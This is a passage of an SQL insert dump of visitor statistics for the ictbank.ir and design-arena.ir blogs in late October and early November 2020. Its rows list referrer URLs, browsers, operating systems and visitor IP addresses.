(6034,'2020-10-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.166.153.202','000',0,1,0),
(6035,'2020-10-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.243.240','000',0,1,0),
(6036,'2020-10-27','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','103.119.140.9','000',0,1,0),
(6037,'2020-10-27','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','139.59.88.102','000',0,57,0),
(6038,'2020-10-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','207.148.23.7','000',0,28,0),
(6039,'2020-10-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.229.26','000',0,5,0),
(6040,'2020-10-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(6041,'2020-10-27','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','118.25.122.245','000',0,3,0),
(6042,'2020-10-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.199.186','000',0,1,0),
(6043,'2020-10-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.17.3.88','000',0,1,0),
(6044,'2020-10-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.146.164','000',0,2,0),
(6045,'2020-10-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.211.73.125','000',0,1,0),
(6046,'2020-10-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.28','000',0,1,0),
(6047,'2020-10-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','201.150.35.113','000',0,1,0),
(6048,'2020-10-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.142','000',0,1,0),
(6049,'2020-10-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','149.202.76.139','000',0,1,0),
(6050,'2020-10-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.46.122.205','000',0,1,0),
(6051,'2020-10-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.39','000',0,1,0),
(6052,'2020-10-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.78.145','000',0,1,0),
(6053,'2020-10-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(6054,'2020-10-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.174.122','000',0,1,0),
(6055,'2020-10-27','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','118.105.205.201','000',0,1,0),
(6056,'2020-10-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','78.85.206.27','000',0,1,0),
(6057,'2020-10-27','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.133.81.226','000',0,1,0),
(6058,'2020-10-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.4.14.255','000',0,1,0),
(6059,'2020-10-27','http://design-arena.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','54.78.65.46','000',0,1,0),
(6060,'2020-10-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','194.36.87.13','000',0,2,0),
(6061,'2020-10-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6062,'2020-10-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.154','000',0,1,0),
(6063,'2020-10-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(6064,'2020-10-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(6065,'2020-10-27','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','129.211.165.225','000',0,3,0),
(6066,'2020-10-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(6067,'2020-10-27','http://design-arena.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','3.250.88.193','000',0,1,0),
(6068,'2020-10-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','185.153.196.226','000',0,1,0),
(6069,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','142.93.158.49','000',0,2,0),
(6070,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','142.93.147.255','000',0,1,0),
(6071,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.142.243','000',0,1,0),
(6072,'2020-10-28','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','116.202.129.130','000',0,1,0),
(6073,'2020-10-28','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.45','000',0,1,0),
(6074,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.57.226.2','000',0,1,0),
(6075,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.57.227.2','000',0,1,0),
(6076,'2020-10-28','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','114.5.94.242','000',0,3,0),
(6077,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.159.160','000',0,1,0),
(6078,'2020-10-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6079,'2020-10-28','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','37.120.203.73','000',0,2,0),
(6080,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.64.186','000',0,1,0),
(6081,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.205.241','000',0,1,0),
(6082,'2020-10-28','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.223.116.9','000',0,1,0),
(6083,'2020-10-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(6084,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','78.85.206.27','000',0,1,0),
(6085,'2020-10-28','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','178.33.34.7','000',0,1,0),
(6086,'2020-10-28','http://ictbank.ir/blog/','Opera','Windows','10.0',NULL,NULL,'','185.85.162.242','000',0,2,0),
(6087,'2020-10-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(6088,'2020-10-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(6089,'2020-10-28','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','171.34.176.30','000',0,1,0),
(6090,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.194.54','000',0,1,0),
(6091,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.21','000',0,1,0),
(6092,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.139.116.66','000',0,1,0),
(6093,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','115.124.64.126','000',0,1,0),
(6094,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.22','000',0,1,0),
(6095,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.106','000',0,1,0),
(6096,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','208.67.16.234','000',0,1,0),
(6097,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.201.61.149','000',0,1,0),
(6098,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.176.241','000',0,1,0),
(6099,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.48.11.101','000',0,1,0),
(6100,'2020-10-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.4','000',0,1,0),
(6101,'2020-10-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.229.26','000',0,6,0),
(6102,'2020-10-29','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','183.60.141.171','000',0,1,0),
(6103,'2020-10-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','194.36.87.13','000',0,4,0),
(6104,'2020-10-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,2,0),
(6105,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.220.111','000',0,1,0),
(6106,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.209.166.8','000',0,2,0),
(6107,'2020-10-29','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(6108,'2020-10-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(6109,'2020-10-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6110,'2020-10-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.188.183.187','000',0,1,0),
(6111,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.235.139','000',0,1,0),
(6112,'2020-10-29','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','35.185.241.102','000',0,1,0),
(6113,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.81.127','000',0,1,0),
(6114,'2020-10-29','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','122.51.243.251','000',0,1,0),
(6115,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.42.84','000',0,1,0),
(6116,'2020-10-29','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.235.251.8','000',0,1,0),
(6117,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.147','000',0,1,0),
(6118,'2020-10-29','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','188.165.148.31','000',0,1,0),
(6119,'2020-10-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(6120,'2020-10-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(6121,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','142.54.207.204','000',0,1,0),
(6122,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.89.182.23','000',0,1,0),
(6123,'2020-10-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.245.4.220','000',0,1,0),
(6124,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.122.60','000',0,1,0),
(6125,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.225.146.4','000',0,1,0),
(6126,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','14.166.127.197','000',0,2,0),
(6127,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','149.202.188.175','000',0,1,0),
(6128,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.156.130','000',0,1,0),
(6129,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.208.52','000',0,1,0),
(6130,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.165.222.148','000',0,1,0),
(6131,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.30','000',0,1,0),
(6132,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','134.0.10.177','000',0,1,0),
(6133,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.50.130.133','000',0,1,0),
(6134,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.120.46','000',0,1,0),
(6135,'2020-10-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(6136,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','110.240.229.237','000',0,43,0),
(6137,'2020-10-30','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','35.194.42.101','000',0,1,0),
(6138,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.19.245','000',0,1,0),
(6139,'2020-10-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(6140,'2020-10-30','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(6141,'2020-10-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(6142,'2020-10-30','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.53.252.12','000',0,2,0),
(6143,'2020-10-30','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','163.172.70.88','000',0,1,0),
(6144,'2020-10-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','80.82.68.113','000',0,1,0),
(6145,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.104.223','000',0,1,0),
(6146,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','27.254.153.20','000',0,1,0),
(6147,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.211.73.9','000',0,1,0),
(6148,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','158.69.206.125','000',0,1,0),
(6149,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.196.22','000',0,1,0),
(6150,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.40.156.13','000',0,1,0),
(6151,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.152.108','000',0,1,0),
(6152,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.165.245','000',0,1,0),
(6153,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.142','000',0,1,0),
(6154,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.152','000',0,1,0),
(6155,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','123.30.238.187','000',0,1,0),
(6156,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.192.69.243','000',0,1,0),
(6157,'2020-10-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','194.36.87.13','000',0,1,0),
(6158,'2020-10-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','93.170.124.208','000',0,2,0),
(6159,'2020-10-30','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','34.204.173.3','000',0,1,0),
(6160,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.26.251.46','000',0,1,0),
(6161,'2020-10-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(6162,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.174','000',0,1,0),
(6163,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.143','000',0,1,0),
(6164,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.196.88.59','000',0,1,0),
(6165,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','47.244.52.99','000',0,1,0),
(6166,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.50.130.60','000',0,1,0),
(6167,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.8','000',0,1,0),
(6168,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','115.68.182.136','000',0,1,0),
(6169,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','158.69.52.131','000',0,1,0),
(6170,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','69.162.81.50','000',0,1,0),
(6171,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.74.138.9','000',0,2,0),
(6172,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.140.0.108','000',0,1,0),
(6173,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.170.40.180','000',0,1,0),
(6174,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','203.205.21.159','000',0,1,0),
(6175,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.208.53','000',0,1,0),
(6176,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.2','000',0,1,0),
(6177,'2020-10-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','147.78.66.202','000',0,1,0),
(6178,'2020-10-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.229.26','000',0,4,0),
(6179,'2020-10-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(6180,'2020-10-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(6181,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.170.86.182','000',0,2,0),
(6182,'2020-10-30','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','217.218.21.242','000',0,1,0),
(6183,'2020-10-30','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','14.177.158.118','000',0,1,0),
(6184,'2020-10-31','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','217.218.21.242','000',0,8,0),
(6185,'2020-10-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.157.112.4','000',0,1,0),
(6186,'2020-10-31','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','69.175.97.170','000',0,1,0),
(6187,'2020-10-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.229.26','000',0,3,0),
(6188,'2020-10-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.193.141','000',0,1,0),
(6189,'2020-10-31','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','104.131.113.93','000',0,1,0),
(6190,'2020-10-31','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','104.131.212.234','000',0,2,0),
(6191,'2020-10-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.253.15','000',0,1,0),
(6192,'2020-10-31','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(6193,'2020-10-31','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','182.138.137.65','000',0,1,0),
(6194,'2020-10-31','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','18.217.9.126','000',0,32,0),
(6195,'2020-10-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.38.61.197','000',0,1,0),
(6196,'2020-10-31','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,1,0),
(6197,'2020-10-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.172.120.182','000',0,1,0),
(6198,'2020-10-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(6199,'2020-10-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(6200,'2020-10-31','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','51.255.138.172','000',0,1,0),
(6201,'2020-10-31','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.211.195.15','000',0,10,0),
(6202,'2020-10-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(6203,'2020-10-31','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','63.143.38.130','000',0,1,0),
(6204,'2020-10-31','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6205,'2020-11-01','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','54.170.125.12','000',0,1,0),
(6206,'2020-11-01','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','217.218.21.242','000',0,8,0),
(6207,'2020-11-01','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','178.32.27.73','000',0,1,0),
(6208,'2020-11-01','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','146.56.197.217','000',0,3,0),
(6209,'2020-11-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.29.152.101','000',0,1,0),
(6210,'2020-11-01','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','104.200.40.132','000',0,1,0),
(6211,'2020-11-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.134.248.230','000',0,10,0),
(6212,'2020-11-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.229.26','000',0,3,0),
(6213,'2020-11-01','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','34.123.47.82','000',0,2,0),
(6214,'2020-11-01','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','3.136.159.240','000',0,1,0),
(6215,'2020-11-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.49.205','000',0,1,0),
(6216,'2020-11-01','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.218.176.174','000',0,1,0),
(6217,'2020-11-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','68.168.122.147','000',0,1,0),
(6218,'2020-11-01','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','89.109.35.231','000',0,6,0),
(6219,'2020-11-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.85.72','000',0,1,0),
(6220,'2020-11-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6221,'2020-11-01','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,1,0),
(6222,'2020-11-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(6223,'2020-11-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.39.180.185','000',0,1,0),
(6224,'2020-11-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(6225,'2020-11-01','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','158.46.219.215','000',0,1,0),
(6226,'2020-11-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(6227,'2020-11-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(6228,'2020-11-02','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','104.197.188.171','000',0,1,0),
(6229,'2020-11-02','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','217.218.21.242','000',0,8,0),
(6230,'2020-11-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(6231,'2020-11-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.135.40','000',0,1,0),
(6232,'2020-11-02','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','111.229.135.171','000',0,3,0),
(6233,'2020-11-02','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(6234,'2020-11-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.34','000',0,1,0),
(6235,'2020-11-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','78.94.58.182','000',0,1,0),
(6236,'2020-11-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.218.167','000',0,1,0),
(6237,'2020-11-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.27.229.26','000',0,3,0),
(6238,'2020-11-02','http://design-arena.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','34.243.112.57','000',0,1,0),
(6239,'2020-11-02','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','94.214.102.171','000',0,2,0),
(6240,'2020-11-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.188.183.187','000',0,1,0),
(6241,'2020-11-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6242,'2020-11-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.165.250','000',0,1,0),
(6243,'2020-11-02','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','62.210.92.175','000',0,1,0),
(6244,'2020-11-02','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.218.227.249','000',0,1,0),
(6245,'2020-11-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.70.57.91','000',0,1,0),
(6246,'2020-11-02','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(6247,'2020-11-02','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','132.148.88.152','000',0,2,0),
(6248,'2020-11-02','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','188.166.37.137','000',0,1,0),
(6249,'2020-11-02','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.164','000',0,1,0),
(6250,'2020-11-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(6251,'2020-11-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(6252,'2020-11-03','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','217.218.21.242','000',0,8,0),
(6253,'2020-11-03','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','93.170.124.208','000',0,1,0),
(6254,'2020-11-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.37.230','000',0,1,0),
(6255,'2020-11-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(6256,'2020-11-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(6257,'2020-11-03','http://mail.design-arena.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','104.248.8.188','000',0,2,0),
(6258,'2020-11-03','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','89.111.33.226','000',0,2,0),
(6259,'2020-11-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.229.17','000',0,1,0),
(6260,'2020-11-03','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','79.127.96.129','000',0,1,0),
(6261,'2020-11-03','http://ictbank.ir/blog','Samsung Internet','Android','10',NULL,NULL,'','86.55.202.208','000',0,2,0),
